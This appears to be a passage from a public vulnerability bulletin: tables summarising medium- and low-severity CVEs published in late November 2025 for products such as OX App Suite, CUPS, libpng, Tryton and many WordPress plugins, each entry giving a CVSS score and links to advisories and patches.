| Open-Xchange GmbH--OX App Suite | Malicious e-mail content can be used to execute script code. Unintended actions can be executed in the context of the user's account, including exfiltration of sensitive information. Sanitization has been updated to avoid such bypasses. No publicly available exploits are known. | 2025-11-27 | 6.1 | CVE-2025-59025 | https://documentation.open-xchange.com/appsuite/security/advisories/csaf/2025/oxas-adv-2025-0003.json |
| Open-Xchange GmbH--OX App Suite | Malicious content uploaded as a file can be used to execute script code when following attacker-controlled links. Unintended actions can be executed in the context of the user's account, including exfiltration of sensitive information. Please deploy the provided updates and patch releases. No publicly available exploits are known. | 2025-11-27 | 5.4 | CVE-2025-30186 | https://documentation.open-xchange.com/appsuite/security/advisories/csaf/2025/oxas-adv-2025-0003.json |
| Open-Xchange GmbH--OX App Suite | Malicious content in office documents can be used to inject script code when editing a document. Unintended actions can be executed in the context of the user's account, including exfiltration of sensitive information. Please deploy the provided updates and patch releases. No publicly available exploits are known. | 2025-11-27 | 5.4 | CVE-2025-30190 | https://documentation.open-xchange.com/appsuite/security/advisories/csaf/2025/oxas-adv-2025-0003.json |
| Open-Xchange GmbH--OX App Suite | Malicious content uploaded as a file can be used to execute script code when following attacker-controlled links. Unintended actions can be executed in the context of the user's account, including exfiltration of sensitive information. Please deploy the provided updates and patch releases. No publicly available exploits are known. | 2025-11-27 | 5.4 | CVE-2025-59026 | https://documentation.open-xchange.com/appsuite/security/advisories/csaf/2025/oxas-adv-2025-0003.json |
| OpenPrinting--cups | OpenPrinting CUPS is an open source printing system for Linux and other Unix-like operating systems. Prior to version 2.4.15, a user in the lpadmin group can use the CUPS web UI to change the configuration and insert a malicious line. The cupsd process, which runs as root, then parses the new configuration and performs an out-of-bounds write. This issue has been patched in version 2.4.15. | 2025-11-29 | 6 | CVE-2025-61915 | https://github.com/OpenPrinting/cups/security/advisories/GHSA-hxm8-vfpq-jrfc https://github.com/OpenPrinting/cups/commit/db8d560262c22a21ee1e55dfd62fa98d9359bcb0 https://github.com/OpenPrinting/cups/releases/tag/v2.4.15 |
| OpenPrinting--cups | OpenPrinting CUPS is an open source printing system for Linux and other Unix-like operating systems. Prior to version 2.4.15, a client that connects to cupsd but sends slow messages, e.g. only one byte per second, delays cupsd as a whole, such that it becomes unusable by other clients. This issue has been patched in version 2.4.15. | 2025-11-29 | 5.1 | CVE-2025-58436 | https://github.com/OpenPrinting/cups/security/advisories/GHSA-8wpw-vfgm-qrrr https://github.com/OpenPrinting/cups/commit/40008d76a001babbb9beb9d9d74b01a86fb6ddb4 https://github.com/OpenPrinting/cups/releases/tag/v2.4.15 |
| oscaruh--Google Drive upload and download link | The Google Drive upload and download link plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'link' parameter of the 'atachfilegoogle' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-27 | 6.4 | CVE-2025-12666 | https://www.wordfence.com/threat-intel/vulnerabilities/id/14ee4247-4cfe-440b-add2-d5d840b1f114?source=cve https://plugins.trac.wordpress.org/browser/google-drive-upload-and-download-link/tags/1.0/pickergoogledirve.php#L27 https://wordpress.org/plugins/google-drive-upload-and-download-link/ |
| ov3rkll--ProjectList | The ProjectList plugin for WordPress is vulnerable to time-based SQL Injection via the 'id' parameter in all versions up to, and including, 0.3.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Editor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-11-25 | 4.9 | CVE-2025-13370 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e424d27b-f719-4fbf-b4eb-83b42130666c?source=cve https://it.wordpress.org/plugins/projectlist/ https://plugins.trac.wordpress.org/browser/projectlist/trunk/pages/pl-add.php#L61 https://plugins.trac.wordpress.org/browser/projectlist/tags/0.3.0/pages/pl-add.php#L61 |
| Oxide--Omicron | In Oxide control plane 15 through 17 before 17.1, API tokens can be renewed past their expiration date. | 2025-11-30 | 5 | CVE-2025-66432 | https://docs.oxide.computer/security/advisories/20251117-1 https://oxide.computer/ https://github.com/oxidecomputer/omicron/compare/01bb875...ec069f0 |
| pnggroup--libpng | LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. Prior to version 1.6.51, a heap buffer over-read vulnerability exists in libpng's png_do_quantize function when processing PNG files with malformed palette indices. The vulnerability occurs when palette_lookup array bounds are not validated against externally-supplied image data, allowing an attacker to craft a PNG file with out-of-range palette indices that trigger out-of-bounds memory access. This issue has been patched in version 1.6.51. | 2025-11-24 | 6.1 | CVE-2025-64505 | https://github.com/pnggroup/libpng/security/advisories/GHSA-4952-h5wq-4m42 https://github.com/pnggroup/libpng/pull/748 https://github.com/pnggroup/libpng/commit/6a528eb5fd0dd7f6de1c39d30de0e41473431c37 |
| pnggroup--libpng | LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From version 1.6.0 to before 1.6.51, a heap buffer over-read vulnerability exists in libpng's png_write_image_8bit function when processing 8-bit images through the simplified write API with convert_to_8bit enabled. The vulnerability affects 8-bit grayscale+alpha, RGB/RGBA, and images with incomplete row data. A conditional guard incorrectly allows 8-bit input to enter code expecting 16-bit input, causing reads up to 2 bytes beyond allocated buffer boundaries. This issue has been patched in version 1.6.51. | 2025-11-24 | 6.1 | CVE-2025-64506 | https://github.com/pnggroup/libpng/security/advisories/GHSA-qpr4-xm66-hww6 https://github.com/pnggroup/libpng/pull/749 https://github.com/pnggroup/libpng/commit/2bd84c019c300b78e811743fbcddb67c9d9bf821 |
| pr-gateway--Blog2Social: Social Media Auto Post & Scheduler | The Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'deleteUserCcDraftPost' function in all versions up to, and including, 8.7.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change the status of arbitrary posts to trash. | 2025-11-25 | 5.4 | CVE-2025-13558 | https://www.wordfence.com/threat-intel/vulnerabilities/id/61b590f5-7854-42f7-b5e2-e6feaaf03a73?source=cve https://plugins.trac.wordpress.org/browser/blog2social/tags/8.7.0/includes/Ajax/Post.php#L1858 https://plugins.trac.wordpress.org/browser/blog2social/trunk/includes/Ajax/Post.php?rev=3401934#L1867 |
| presstigers--Simple Folio | The Simple Folio plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'portfolio_name' parameter in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-27 | 6.4 | CVE-2025-12151 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5c7b9827-59a7-4a8f-88d5-0b27c3ea2925?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3401878%40simple-folio&new=3401878%40simple-folio&sfp_email=&sfph_mail= |
| qodeinteractive--QODE Wishlist for WooCommerce | The QODE Wishlist for WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.2.7 via the 'qode_wishlist_for_woocommerce_wishlist_table_item_callback' function due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to update the public view of arbitrary wishlists. | 2025-11-27 | 5.3 | CVE-2025-13157 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b15d1992-ecf9-4253-b832-056b34f42b48?source=cve https://plugins.trac.wordpress.org/browser/qode-wishlist-for-woocommerce/trunk/inc/wishlist/shortcodes/wishlist-table/helper-ajax.php#L95 https://plugins.trac.wordpress.org/changeset/3402469/ |
| quadlayers--Perfect Brands for WooCommerce | The Perfect Brands for WooCommerce plugin for WordPress is vulnerable to time-based SQL Injection via the `brands` attribute of the `products` shortcode in all versions up to, and including, 3.6.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-11-24 | 6.5 | CVE-2025-10144 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f4618bfd-77d9-4396-b041-d7ba0f6ec75a?source=cve https://plugins.trac.wordpress.org/browser/perfect-woocommerce-brands/tags/3.6.0/lib/class-woocommerce.php#L112 |
| quadlayers--Search Exclude | The Search Exclude plugin for WordPress is vulnerable to unauthorized modification of data due to an insufficient capability check on the Base::get_rest_permission() method in all versions up to, and including, 2.5.7. This makes it possible for authenticated attackers, with Contributor-level access and above, to modify plugin settings, such as adding arbitrary posts to the search exclusion list. | 2025-11-25 | 4.3 | CVE-2025-10646 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b0f62d05-84fb-4cd6-9e5f-0dcfa305ce68?source=cve https://plugins.trac.wordpress.org/changeset/3379004/search-exclude |
| realin--wp-twitpic | The wp-twitpic plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple parameters of the 'twitpic' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-27 | 6.4 | CVE-2025-12670 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bb36fd27-bcea-481c-a7aa-815dc684ed8b?source=cve https://wordpress.org/plugins/wp-twitpic/ https://plugins.trac.wordpress.org/browser/wp-twitpic/tags/1.0/wp-twitpic.php#L42 |
| Red Hat--Red Hat build of Keycloak 26.2 | A flaw was found in the Keycloak LDAP User Federation provider. This vulnerability allows an authenticated realm administrator to trigger deserialization of untrusted Java objects via a malicious LDAP server configuration. | 2025-11-25 | 5.5 | CVE-2025-13467 | RHSA-2025:22088 RHSA-2025:22089 RHSA-2025:22090 RHSA-2025:22091 https://access.redhat.com/security/cve/CVE-2025-13467 RHBZ#2416038 |
| Red Hat--Red Hat OpenStack Platform 13 (Queens) | The mistral-dashboard plugin for openstack has a local file inclusion vulnerability through the 'Create Workbook' feature that may result in disclosure of arbitrary local files content. | 2025-11-26 | 6.5 | CVE-2021-4472 | https://access.redhat.com/security/cve/CVE-2021-4472 https://bugs.launchpad.net/horizon/+bug/1931558 RHBZ#2417321 https://review.opendev.org/c/openstack/mistral-dashboard/+/800952 https://review.opendev.org/c/openstack/python-mistralclient/+/800950 |
| redaxo--redaxo | REDAXO is a PHP-based CMS. Prior to version 5.20.1, a reflected Cross-Site Scripting (XSS) vulnerability exists in the Mediapool view where the request parameter args[types] is rendered into an info banner without HTML-escaping. This allows arbitrary JavaScript execution in the backend context when an authenticated user visits a crafted link while logged in. This issue has been patched in version 5.20.1. | 2025-11-26 | 6.1 | CVE-2025-66026 | https://github.com/redaxo/redaxo/security/advisories/GHSA-x6vr-q3vf-vqgq https://github.com/redaxo/redaxo/commit/58929062312cf03e344ab04067a365e6b6ee66aa |
| rnags--Reuters Direct | The Reuters Direct plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'logoff' action in all versions up to, and including, 3.0.0. This makes it possible for unauthenticated attackers to reset the plugin's settings. | 2025-11-27 | 5.3 | CVE-2025-12579 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4360f293-201c-40c1-9603-931d72cc79bc?source=cve https://wordpress.org/plugins/reuters-direct/ |
| rnags--Reuters Direct | The Reuters Direct plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.0.0. This is due to missing or incorrect nonce validation on the 'class-reuters-direct-settings.php' page. This makes it possible for unauthenticated attackers to reset the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-11-27 | 4.3 | CVE-2025-12578 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0e98a899-1578-45bf-ba1d-92703e38abd9?source=cve https://wordpress.org/plugins/reuters-direct/ |
| shapedplugin--Quick View for WooCommerce | The Quick View for WooCommerce plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.2.17 via the 'wqv_popup_content' AJAX endpoint due to insufficient restrictions on which products can be included. This makes it possible for unauthenticated attackers to extract data from private products that they should not have access to. | 2025-11-27 | 5.3 | CVE-2025-12584 | https://www.wordfence.com/threat-intel/vulnerabilities/id/809472d5-1698-42da-b414-1dda40983a6e?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3402213%40woo-quickview&new=3402213%40woo-quickview&sfp_email=&sfph_mail= |
| sigalitam--Just Highlight | The Just Highlight plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Highlight Color' setting in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the plugin's settings page. | 2025-11-25 | 4.4 | CVE-2025-13311 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d21187bc-5bd0-49b9-9ef2-6654263cd93c?source=cve https://plugins.trac.wordpress.org/browser/just-highlight/trunk/just-highlight.php#L169 https://plugins.trac.wordpress.org/browser/just-highlight/tags/1.0.3/just-highlight.php#L169 |
| SourceCodester--Online Student Clearance System | A flaw has been found in SourceCodester Online Student Clearance System 1.0. Impacted is an unknown function of the file /Admin/changepassword.php. This manipulation of the argument txtconfirm_password causes sql injection. It is possible to initiate the attack remotely. The exploit has been published and may be used. | 2025-11-24 | 4.7 | CVE-2025-13586 | VDB-333350 \| SourceCodester Online Student Clearance System changepassword.php sql injection VDB-333350 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #700130 \| SourceCodester Online Student Clearance System 1.0 SQL Injection https://github.com/CaseyW33/CVE/issues/2 https://www.sourcecodester.com/ |
| sscovil--SortTable Post | The SortTable Post plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' parameter in the sorttablepost shortcode in all versions up to, and including, 4.2. This is due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page via mouse interaction. | 2025-11-27 | 6.4 | CVE-2025-12649 | https://www.wordfence.com/threat-intel/vulnerabilities/id/80c700fa-619f-4ffe-a09a-bcdae2f71a7d?source=cve https://plugins.trac.wordpress.org/browser/sorttable-post/tags/4.2/sorttablepost.php#L100 |
| sunarc--Refund Request for WooCommerce | The Refund Request for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'update_refund_status' function in all versions up to, and including, 1.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update refund statuses to approved or rejected. | 2025-11-25 | 4.3 | CVE-2025-12634 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f15b4596-8e00-4e66-8b51-f49ede1ff307?source=cve https://wordpress.org/plugins/refund-request-for-woocommerce/ |
| taosir--WTCMS | A security flaw has been discovered in taosir WTCMS up to 01a5f68a3dfc2fdddb44eed967bb2d4f60487665. This affects the function check/uncheck/delete of the file application/Comment/Controller/CommentadminController.class.php of the component CommentadminController. The manipulation of the argument ids results in sql injection. The attack can be executed remotely. The exploit has been released to the public and may be exploited. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-30 | 6.3 | CVE-2025-13783 | VDB-333787 \| taosir WTCMS CommentadminController CommentadminController.class.php delete sql injection VDB-333787 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #688838 \| wtcms cms 1.0 SQL Injection Submit #688839 \| wtcms cms 1.0 SQL Injection (Duplicate) https://www.yuque.com/shangu-vvuup/ydpg69/dd5zpygt7w5w4d19?singleDoc |
| themehunk--Wishlist for WooCommerce | The Wishlist for WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.0.9 via several functions in class-th-wishlist-frontend.php due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to modify other users' wishlists. | 2025-11-25 | 6.5 | CVE-2025-12040 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6d7c8f79-4dfd-4d6f-b533-dc7a5998dfc1?source=cve https://wordpress.org/plugins/th-wishlist/ |
| themesupport--Hide Category by User Role for WooCommerce | The Hide Category by User Role for WooCommerce plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 2.3.1. This is due to a missing capability check on the admin_init hook that executes wp_cache_flush(). This makes it possible for unauthenticated attackers to flush the site's object cache via forged requests, potentially degrading site performance. | 2025-11-27 | 5.3 | CVE-2025-13441 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b05b0f6d-ffa4-40f4-b969-1153192c52d6?source=cve https://plugins.trac.wordpress.org/browser/hide-category-by-user-role-for-woocommerce/trunk/admin/admin-ui-setup.php#L165 https://plugins.trac.wordpress.org/browser/hide-category-by-user-role-for-woocommerce/tags/2.3.1/admin/admin-ui-setup.php#L165 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3402760%40hide-category-by-user-role-for-woocommerce&new=3402760%40hide-category-by-user-role-for-woocommerce&sfp_email=&sfph_mail= |
| trustindex--Customer Reviews Collector for WooCommerce | The Customer Reviews Collector for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'email-text' parameter in all versions up to, and including, 4.6.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-11-27 | 6.1 | CVE-2025-12123 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6091e396-8cd8-4c56-89cb-7699adb3d798?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3389840%40customer-reviews-collector-for-woocommerce&new=3389840%40customer-reviews-collector-for-woocommerce&sfp_email=&sfph_mail= |
| Tryton--sao | Tryton sao (aka tryton-sao) before 7.6.9 allows XSS via an HTML attachment. This is fixed in 7.6.9, 7.4.19, 7.0.38, and 6.0.67. | 2025-11-30 | 5.4 | CVE-2025-66420 | https://discuss.tryton.org/t/security-release-for-issue-14290/8895 https://foss.heptapod.net/tryton/tryton/-/issues/14290 |
| Tryton--sao | Tryton sao (aka tryton-sao) before 7.6.11 allows XSS because it does not escape completion values. This is fixed in 7.6.11, 7.4.21, 7.0.40, and 6.0.69. | 2025-11-30 | 5.4 | CVE-2025-66421 | https://discuss.tryton.org/t/security-release-for-issue-14363/8951 https://foss.heptapod.net/tryton/tryton/-/issues/14363 |
| Tryton--trytond | Tryton trytond 6.0 before 7.6.11 does not enforce access rights for data export. This is fixed in 7.6.11, 7.4.21, 7.0.40, and 6.0.70. | 2025-11-30 | 6.5 | CVE-2025-66424 | https://discuss.tryton.org/t/security-release-for-issue-14366/8953 https://foss.heptapod.net/tryton/tryton/-/issues/14366 |
| Tryton--trytond | Tryton trytond before 7.6.11 allows remote attackers to obtain sensitive trace-back (server setup) information. This is fixed in 7.6.11, 7.4.21, 7.0.40, and 6.0.70. | 2025-11-30 | 4.3 | CVE-2025-66422 | https://discuss.tryton.org/t/security-release-for-issue-14354/8950 https://foss.heptapod.net/tryton/tryton/-/issues/14354 |
| Uniong--WebITR | WebITR developed by Uniong has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read database contents. | 2025-11-28 | 6.5 | CVE-2025-13769 | https://www.twcert.org.tw/tw/cp-132-10538-6a26d-1.html https://www.twcert.org.tw/en/cp-139-10539-21f45-2.html |
| Uniong--WebITR | WebITR developed by Uniong has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read database contents. | 2025-11-28 | 6.5 | CVE-2025-13770 | https://www.twcert.org.tw/tw/cp-132-10538-6a26d-1.html https://www.twcert.org.tw/en/cp-139-10539-21f45-2.html |
| Uniong--WebITR | WebITR developed by Uniong has an Arbitrary File Read vulnerability, allowing authenticated remote attackers to exploit Relative Path Traversal to download arbitrary system files. | 2025-11-28 | 6.5 | CVE-2025-13771 | https://www.twcert.org.tw/tw/cp-132-10538-6a26d-1.html https://www.twcert.org.tw/en/cp-139-10539-21f45-2.html |
| vithanhlam--Zweb Social Mobile Ứng Dụng Nút Gọi Mobile | The Zweb Social Mobile - Ứng Dụng Nút Gọi Mobile plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'vithanhlam_zsocial_save_messager', 'vithanhlam_zsocial_save_zalo', 'vithanhlam_zsocial_save_hotline', and 'vithanhlam_zsocial_save_contact' parameters in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-11-25 | 4.4 | CVE-2025-12032 | https://www.wordfence.com/threat-intel/vulnerabilities/id/26d12c52-d08f-4a6c-ba59-0e26dfb33ae5?source=cve https://wordpress.org/plugins/zweb-social-mobile/ |
| webgarh--Peer Publish | The Peer Publish plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing nonce validation on the website management pages. This makes it possible for unauthenticated attackers to add, modify, or delete website configurations via a forged request granted they can trick an administrator into performing an action such as clicking on a link. | 2025-11-25 | 4.3 | CVE-2025-12587 | https://www.wordfence.com/threat-intel/vulnerabilities/id/fffa6c31-8da0-48d7-b603-64f50950787b?source=cve https://plugins.trac.wordpress.org/browser/peer-publish/tags/1.0/admin/admin-pages/newwebsite.php#L17 https://plugins.trac.wordpress.org/browser/peer-publish/tags/1.0/admin/admin-pages/websites.php#L20 |
| winston-dsouza--Ecommerce-Website | A weakness has been identified in winston-dsouza Ecommerce-Website up to 87734c043269baac0b4cfe9664784462138b1b2e. Affected by this issue is some unknown functionality of the file /includes/header_menu.php of the component GET Parameter Handler. Executing manipulation of the argument Error can lead to cross site scripting. The attack can be executed remotely. The exploit has been made available to the public and could be exploited. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-30 | 4.3 | CVE-2025-13793 | VDB-333797 \| winston-dsouza Ecommerce-Website GET Parameter header_menu.php cross site scripting VDB-333797 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #691622 \| ecommerce-website-master web 1 XSS vulnerability https://github.com/dream357/report/blob/main/ecommerce-website.docx |
| Wireshark Foundation--Wireshark | A BPv7 dissector crash in Wireshark 4.6.0 allows denial of service. | 2025-11-26 | 5.5 | CVE-2025-13674 | https://www.wireshark.org/security/wnpa-sec-2025-05.html GitLab Issue #20770 |
| wisc--HTCondor | HTCondor Access Point before 25.3.1 allows an authenticated user to impersonate other users on the local machine by submitting a batch job. This is fixed in 24.12.14, 25.0.3, and 25.3.1. The earliest affected version is 24.7.3. | 2025-11-30 | 4.2 | CVE-2025-66433 | https://htcondor.org/security/vulnerabilities/HTCONDOR-2025-0002.html |
| wpoets--Soundslides | The Soundslides plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the soundslides shortcode in all versions up to, and including, 1.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-27 | 6.4 | CVE-2025-12713 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cdd7e9d1-a580-4b32-9365-7ce17cdc37cd?source=cve https://plugins.trac.wordpress.org/browser/soundslides/tags/1.4.2/soundslide.php#L101 https://plugins.trac.wordpress.org/browser/soundslides/tags/1.4.2/soundslide.php#L102 https://plugins.trac.wordpress.org/browser/soundslides/tags/1.4.2/soundslide.php#L117 https://plugins.trac.wordpress.org/browser/soundslides/tags/1.4.2/soundslide.php#L143 |
| yungifez--Skuul School Management System | A security vulnerability has been detected in yungifez Skuul School Management System up to 2.6.5. This issue affects some unknown processing of the file /user/profile of the component Image Handler. Such manipulation leads to information disclosure. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-30 | 4.3 | CVE-2025-13785 | VDB-333789 \| yungifez Skuul School Management System Image profile information disclosure VDB-333789 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #689026 \| yungifez Skuul v2.6.5 Exposure of Sensitive Information Through Metadata https://gist.github.com/thezeekhan/02f5255506080849fc732eea07008634 |
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| codingWithElias--School Management System | A weakness has been identified in codingWithElias School Management System up to f1ac334bfd89ae9067cc14dea12ec6ff3f078c01. Affected is an unknown function of the file /student-view.php of the component Edit Student Info Page. This manipulation of the argument First Name causes cross site scripting. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be exploited. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. Other parameters might be affected as well. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-30 | 2.4 | CVE-2025-13795 | VDB-333806 \| codingWithElias School Management System Edit Student Info student-view.php cross site scripting VDB-333806 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #691836 \| school-management-system-php web 1 XSS vulnerability https://github.com/Al1ce258/MY-CVE-REPORTS/blob/main/school-management-system.md |
| contao--contao | Contao is an Open Source CMS. From version 4.0.0 to before 4.13.57, before 5.3.42, and before 5.6.5, it is possible to inject code into the template output that will be executed in the browser in the front end and back end. This issue has been patched in versions 4.13.57, 5.3.42, and 5.6.5. A workaround for this issue is to not use the affected templates or to patch them manually. | 2025-11-25 | 3.3 | CVE-2025-65961 | https://github.com/contao/contao/security/advisories/GHSA-68q5-78xp-cwwc https://contao.org/en/security-advisories/cross-site-scripting-in-templates |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.2 before 18.4.5, 18.5 before 18.5.3, and 18.6 before 18.6.1 that could have allowed an authenticated user with access to certain logs to obtain sensitive tokens under specific conditions. | 2025-11-26 | 2 | CVE-2025-13611 | GitLab Issue #545947 |
| IBM--Sterling B2B Integrator | IBM Sterling B2B Integrator and IBM Sterling File Gateway 6.0.0.0 through 6.1.2.7 and 6.2.0.0 through 6.2.0.5 and 6.2.1.1 could disclose sensitive information due to a missing or insecure SameSite attribute for a sensitive cookie. | 2025-11-25 | 3.7 | CVE-2025-36134 | https://www.ibm.com/support/pages/node/7252210 |
| KDE--Skanpage | In KDE Skanpage before 25.08.0, an attempt at file overwrite can result in the contents of the new file at the beginning followed by the partial contents of the old file at the end, because of use of QIODevice::ReadWrite instead of QIODevice::WriteOnly. | 2025-11-26 | 3.2 | CVE-2025-55174 | https://github.com/KDE/skanpage/tags https://invent.kde.org/utilities/skanpage/-/commit/de3ad2941054a26920e022dc7c4a3dc16c065b5a https://kde.org/info/security/advisory-20250811-1.txt |
| libexpat project--libexpat | In libexpat through 2.7.3, a crafted file with an approximate size of 2 MiB can lead to dozens of seconds of processing time. | 2025-11-28 | 2.9 | CVE-2025-66382 | https://github.com/libexpat/libexpat/issues/1076 |
| MongoDB Inc.--MongoDB Server | A user with access to the cluster with a limited set of privilege actions may be able to terminate queries that are being executed by other users. This may cause a denial of service by preventing a fraction of queries from successfully completing. This issue affects MongoDB Server v7.0 versions prior to 7.0.26 and MongoDB Server v8.0 versions prior to 8.0.14. | 2025-11-25 | 3.1 | CVE-2025-13643 | https://jira.mongodb.org/browse/SERVER-103582 |
| motogadget--mo.lock Ignition Lock | A vulnerability was determined in motogadget mo.lock Ignition Lock up to 20251125. Affected by this vulnerability is an unknown functionality of the component NFC Handler. Executing manipulation can lead to use of a hard-coded cryptographic key. The physical device can be targeted for the attack. A high complexity level is associated with this attack. The exploitation appears to be difficult. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-29 | 2 | CVE-2025-6666 | VDB-333785 \| motogadget mo.lock Ignition Lock NFC hard-coded key VDB-333785 \| CTI Indicators (IOB, IOC, TTP) Submit #701162 \| motogadget mo.lock NFC CWE-290, CWE-327, CWE-1394 https://office.dngr.us/s/iZHrwtf2xRPoeJj/download |
| mustangproject--Mustang | Mustang before 2.16.3 allows exfiltrating files via XXE attacks. | 2025-11-28 | 2.8 | CVE-2025-66372 | https://github.com/ZUGFeRD/mustangproject/issues/685 https://github.com/ZUGFeRD/mustangproject/pull/725 https://github.com/ZUGFeRD/mustangproject/releases/tag/core-2.16.3 |
| n/a--Eigenfocus | A security vulnerability has been detected in Eigenfocus up to 1.4.0. This vulnerability affects unknown code of the component Description Handler. The manipulation of the argument entry.description/time_entry.description leads to cross site scripting. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 1.4.1 is able to resolve this issue. The identifier of the patch is 7dec94c9d1f3e513e0ee38ba68caaba628e08582. Upgrading the affected component is advised. | 2025-11-24 | 3.5 | CVE-2025-13584 | VDB-333348 \| Eigenfocus Description cross site scripting VDB-333348 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #699689 \| Eigenfocus Eigenfocus Free Edition 1.4.0 Cross Site Scripting https://github.com/Stolichnayer/eigenfocus-stored-xss https://github.com/Eigenfocus/eigenfocus/pull/358 https://github.com/Eigenfocus/eigenfocus/commit/7dec94c9d1f3e513e0ee38ba68caaba628e08582 https://github.com/Eigenfocus/eigenfocus/releases/tag/v1.4.1-free |
| NVIDIA--DGX Spark | NVIDIA DGX Spark GB10 contains a vulnerability in SROOT firmware, where an attacker could cause a resource to be reused. A successful exploit of this vulnerability might lead to information disclosure. | 2025-11-25 | 3.3 | CVE-2025-33198 | https://nvd.nist.gov/vuln/detail/CVE-2025-33198 https://www.cve.org/CVERecord?id=CVE-2025-33198 https://nvidia.custhelp.com/app/answers/detail/a_id/5720 |
